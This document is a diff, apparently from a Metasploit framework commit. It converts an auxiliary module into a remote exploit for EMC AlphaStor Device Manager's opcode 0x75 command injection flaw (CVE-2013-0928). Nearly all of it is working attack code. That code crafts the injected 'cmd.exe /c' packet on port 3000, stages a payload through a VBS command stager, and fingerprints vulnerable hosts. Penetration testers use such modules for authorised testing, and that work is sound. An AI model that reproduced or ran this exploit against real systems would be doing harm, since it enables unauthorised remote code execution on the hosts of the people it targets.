|
1 | 1 | require 'msf/core' |
2 | 2 |
|
3 | | -class Metasploit3 < Msf::Auxiliary |
| 3 | +class Metasploit3 < Msf::Exploit::Remote |
| 4 | + Rank = ExcellentRanking |
4 | 5 |
|
5 | 6 | include Msf::Exploit::Remote::Tcp |
| 7 | + include Msf::Exploit::CmdStager |
6 | 8 |
|
7 | 9 | def initialize(info = {}) |
8 | 10 | super(update_info(info, |
9 | | - 'Name' => 'EMC AlphaStor Device Manager Opcode 0x75', |
10 | | - 'Description' => %q{ |
11 | | - This module exploits a design flaw within the Device |
12 | | - Manager (rrobtd.exe) which listens on port 3000. When |
13 | | - parsing the 0x75 command, the process does not properly |
14 | | - filter user supplied input allowing for arbitrary command |
15 | | - injection. |
| 11 | + 'Name' => 'EMC AlphaStor Device Manager Opcode 0x75 Command Injection', |
| 12 | + 'Description' => %q{ |
| 13 | + This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75 |
| 14 | + command, the process does not properly filter user supplied input allowing for arbitrary |
| 15 | + command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116 |
| 16 | + with Windows 2003 SP2 and Windows 2008 R2. |
16 | 17 | }, |
17 | | - 'Author' => [ |
18 | | - 'Preston Thornburn', # [email protected] |
19 | | - 'Mohsan Farid', # [email protected] |
20 | | - 'Brent Morris' # [email protected] |
21 | | - ], |
22 | | - 'License' => MSF_LICENSE, |
23 | | - 'Version' => '$Revision: $', |
24 | | - 'References' => |
| 18 | + 'Author' => |
25 | 19 | [ |
26 | | - [ 'CVE', '2013-0928' ], |
27 | | - [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-033/' ] |
| 20 | + 'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery |
| 21 | + 'Preston Thornburn <prestonthornburg[at]gmail.com>', # msf module |
| 22 | + 'Mohsan Farid <faridms[at]gmail.com>', # msf module |
| 23 | + 'Brent Morris <inkrypto[at]gmail.com>', # msf module |
| 24 | + 'juan vazquez' # convert aux module into exploit |
28 | 25 | ], |
29 | | - 'DisclosureDate' => 'Jan 18 2013')) |
| 26 | + 'License' => MSF_LICENSE, |
| 27 | + 'References' => |
| 28 | + [ |
| 29 | + ['CVE', '2013-0928'], |
| 30 | + ['ZDI', '13-033'] |
| 31 | + ], |
| 32 | + 'Platform' => 'win', |
| 33 | + 'Arch' => ARCH_X86, |
| 34 | + 'Payload' => |
| 35 | + { |
| 36 | + 'Space' => 2048, |
| 37 | + 'DisableNops' => true |
| 38 | + }, |
| 39 | + 'Targets' => |
| 40 | + [ |
| 41 | + [ 'EMC AlphaStor 4.0 < build 800 / Windows Universal', {} ] |
| 42 | + ], |
| 43 | + 'CmdStagerFlavor' => 'vbs', |
| 44 | + 'DefaultTarget' => 0, |
| 45 | + 'DisclosureDate' => 'Jan 18 2013')) |
30 | 46 |
|
31 | 47 | register_options( |
32 | 48 | [ |
33 | | - OptString.new('CMD', [ false, 'The OS command to execute', 'calc.exe']), |
34 | 49 | Opt::RPORT(3000) |
35 | 50 | ], self.class ) |
36 | 51 | end |
37 | 52 |
|
38 | | - def run |
| 53 | + def check |
| 54 | + packet = "\x75~ mminfo & #{rand_text_alpha(512)}" |
| 55 | + res = send_packet(packet) |
| 56 | + if res && res =~ /Could not fork command/ |
| 57 | + return Exploit::CheckCode::Detected |
| 58 | + end |
| 59 | + |
| 60 | + Exploit::CheckCode::Unknown |
| 61 | + end |
| 62 | + |
| 63 | + def exploit |
| 64 | + execute_cmdstager({ :linemax => 487 }) |
| 65 | + end |
| 66 | + |
| 67 | + def execute_command(cmd, opts) |
| 68 | + padding = rand_text_alpha_upper(489 - cmd.length) |
| 69 | + packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"# #{padding}" |
39 | 70 | connect |
40 | | - padding = Rex::Text.rand_text_alpha_upper(512) |
| 71 | + sock.put(packet) |
| 72 | + begin |
| 73 | + sock.get_once |
| 74 | + rescue EOFError |
| 75 | + fail_with(Failure::Unknown, "Failed to deploy CMD Stager") |
| 76 | + end |
| 77 | + disconnect |
| 78 | + end |
41 | 79 |
|
42 | | - packet = "\x75~ mminfo &cmd.exe /c #{datastore['CMD']} #{padding}" |
| 80 | + def execute_cmdstager_begin(opts) |
| 81 | + if flavor =~ /vbs/ && self.decoder =~ /vbs_b64/ |
| 82 | + cmd_list.each do |cmd| |
| 83 | + cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\")") |
| 84 | + end |
| 85 | + end |
| 86 | + end |
43 | 87 |
|
44 | | - print_status("Sending command \'#{datastore['CMD']}\' to the remote host...") |
| 88 | + def send_packet(packet) |
| 89 | + connect |
45 | 90 |
|
46 | 91 | sock.put(packet) |
| 92 | + begin |
| 93 | + meta_data = sock.get_once(8) |
| 94 | + rescue EOFError |
| 95 | + meta_data = nil |
| 96 | + end |
47 | 97 |
|
48 | | - res = sock.get_once |
49 | | - if res |
50 | | - print_status("#{Rex::Text.to_hex_dump(res)}") |
| 98 | + unless meta_data |
| 99 | + disconnect |
| 100 | + return nil |
51 | 101 | end |
52 | 102 |
|
53 | | - disconnect |
| 103 | + code, length = meta_data.unpack("N*") |
| 104 | + |
| 105 | + unless code == 1 |
| 106 | + disconnect |
| 107 | + return nil |
| 108 | + end |
| 109 | + |
| 110 | + begin |
| 111 | + data = sock.get_once(length) |
| 112 | + rescue EOFError |
| 113 | + data = nil |
| 114 | + ensure |
| 115 | + disconnect |
| 116 | + end |
| 117 | + |
| 118 | + data |
54 | 119 | end |
55 | 120 |
|
56 | 121 | end |
0 commit comments